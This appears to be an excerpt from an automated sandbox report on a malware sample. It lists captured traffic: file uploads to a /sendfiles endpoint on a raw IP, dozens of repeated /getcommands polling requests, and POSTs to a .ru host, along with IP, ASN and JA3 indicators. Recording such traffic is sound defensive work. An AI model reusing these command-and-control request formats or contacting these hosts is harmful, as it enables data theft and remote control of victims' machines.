45 56 51 53 45 47 56 50 43 56 4e 58 59 4f 55 45 42 50 57 59 4a 56 42 4f 56 5a 48 48 53 49 56 51 45 4c 41 53 4c 4d 46 4c 4d 49 47 50 46 54 53 57 5a 55 59 41 47 55 43 4b 46 43 51 58 58 55 57 4d 4d 45 53 54 49 43 54 48 4f 4e 4c 55 59 53 50 55 57 4f 54 51 4b 57 52 52 51 4d 55 48 47 5a 47 41 41 45 5a 4f 50 4f 4b 51 55 4c 46 57 52 50 45 46 44 59 45 4f 4e 4c 4b 5
Source: global traffic	HTTP traffic detected: POST /sendfiles HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 1129Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 58 51 41 43 48 4d 5a 49 48 55 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 58 51 41 43 48 4d 5a 49 48 55 55 4a 4c 4c 57 44 4c 4b 49 48 54 5a 58 46 49 4d 54 49 45 47 47 57 51 57 4f 47 50 47 44 47 4a 43 4e 55 52 42 56 43 4a 51 58 56 42 4e 50 56 54 4f 50 4d 4e 4e 54 54 44 45 47 53 41 54 4d 57 51 56 4a 51 46 50 42 52 5a 59 53 57 58 46 5a 42 52 44 52 54 4d 49 50 58 47 50 59 4f 42 50 54 42 47 42 52 43 4c 4b 4f 42 50 57 45 51 59 4b 53 57 4d 52 5a 53 55 56 4f 55 5a 59 58 50 55 4e 51 52 59 53 47 49 4a 51 59 4e 47 53 51 52 59 48 48 4a 5a 4a 55 4d 51 4a 50 54 41 43 58 4e 42 49 45 44 5a 43 54 43 5a 46 4a 49 58 4b 43 59 43 4b 49 50 5a 4e 56 54 46 42 51 42 48 56 51 50 44 5a 51 52 56 53 55 56 55 52 4d 58 48 4b 45 47 4b 4f 45 5a 45 4b 49 42 4c 4d 56 4a 5a 55 44 45 43 52 45 4f 43 49 50 47 53 46 55 43 54 53 43 45 46 42 47 55 56 4f 43 4e 44 42 41 54 56 5a 47 57 4d 56 50 54 5a 4a 53 46 5a 52 48 58 49 52 4a 52 43 4e 4b 47 45 4c 49 57 44 4e 5a 47 41 4d 4b 53 42 57 4d 57 48 4c 46 45 58 47 51 42 4f 55 45 54 56 4a 46 4f 4f 51 58 55 48 56 4c 48 43 4c 4e 50 58 56 4d 4d 4a 41 4a 54 48 4d 57 41 59 4a 4c 54 59 4a 54 46 47 46 4b 51 46 4c 53 56 51 50 50 44 58 42 5a 47 4d 44 50 4e 4d 46 49 50 43 55 41 49 45 43 44 59 53 4c 41 43 46 57 50 4a 42 5a 4c 52 4d 48 57 51 4a 44 44 4f 44 47 59 42 4e 43 4d 4e 50 5a 56 5a 45 46 4f 55 4f 59 59 59 5a 53 54 5a 4b 4c 58 56 43 4e 58 57 50 42 4c 42 43 48 54 51 51 45 46 4f 49 4c 42 45 4a 50 4b 52 55 5a 4a 57 57 44 4e 4b 47 55 4e 41 41 44 57 5a 48 43 4f 55 52 46 46 5a 45 4a 43 50 42 47 49 4c 46 46 43 4e 56 54 41 4e 46 58 4c 57 58 51 44 59 4a 55 4c 48 45 55 51 47 4f 42 4e 55 5a 55 43 46 49 59 45 49 54 54 50 4b 45 5a 51 49 48 50 4f 4b 57 5a 44 4d 4d 53 55 42 49 51 58 48 55 57 42 42 45 47 47 52 47 51 50 43 4b 52 46 4d 41 46 4d 43 4b 42 4c 4e 50 58 55 58 43 43 58 51 44 48 51 58 50 4b 48 56 59 51 57 48 58 45 47 48 49 43 44 4f 5a 4a 55 43 4c 54 42 4b 4b 5a 4b 52 4b 4f 51 41 5a 57 58 48 4b 41 48 56 4b 44 4f 46 47 4b 54 49 51 48 45 47 43 4d 50 59 48 4b 4c 47 49 44 45 53 57 4e 41 56 41 53 46 55 43 4f 47 43 59 51 51 52 4c 57 51 49 57 44 46 46 43 51 59 48 59 48 4b 4b 50 49 42 4f 47 4f 4b 58 57 4f 5a 57 43 56 48 4b 4d 47 54 58 46 58 41 4b 59 59 42 5a 51 47 5a 57 53 4d 46 49 43 4a 52 58 47 44 4c 4a 41 48 50 53 54 4d 50 49 41 58 52 5a 4e 4d 4a 42 48 4a 46 56 5a 4f 57 44 4b 4f 4b 50 44 51 52 4b 49 52 41 52 4a 45 4a 4d 4e 50 43 53 45 57 55 46 48 4b 4c 45 4c 50 5a 57 43 4d 57 4c 5a 54 5a 42 46 57 4a 54 49 42 58 41 5a 42 54 54 4a 4f 45 47 48 43 4c 58 55 5a 59 42 59 47 59 55 4c 46 47 4a 50 4c 55 4e 56 4a 43 54 44 4b 56 55 48 4b 46 43 4d 43 45 53 57 58 4d 44 4c 5a 51 4b 44 55 57 54 41 45 43 52 44 42 57 45 43 58 50 43 48 50 42 43 45 52 44 41 4a 4f 47 46 43 4
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=1
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=2
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=3
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=4
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=5
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=6
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 37 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=7
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 38 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=8
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 39 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=9
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=10
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=11
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=12
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=13
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=14
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=15
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=16
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 37 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=17
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 38 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=18
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 39 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=19
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=20
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=21
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=22
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=23
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=24
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=25
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=26
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 37 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=27
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 38 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=28
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 39 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=29
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=30
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=31
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=32
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=33
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=34
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=35
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=36
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 37 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=37
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 38 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=38
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 39 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=39
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=40
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=41
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=42
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=43
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=44
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=45
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=46

Source: Joe Sandbox View	IP Address: 77.221.157.163 77.221.157.163
Source: Joe Sandbox View	IP Address: 58.151.148.90 58.151.148.90

Source: Joe Sandbox View	ASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
Source: Joe Sandbox View	ASN Name: TelconetSAEC TelconetSAEC
Source: Joe Sandbox View	ASN Name: POWERVIS-AS-KRLGPOWERCOMMKR POWERVIS-AS-KRLGPOWERCOMMKR
Source: Joe Sandbox View	ASN Name: PORTLANEwwwportlanecomSE PORTLANEwwwportlanecomSE

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qydxnaxywntsme.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://doqnumhybayljg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pqbpwctaxuyno.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ktdmwvwgrxicbyf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xjvjtoqsxecwt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: gebeus.ru
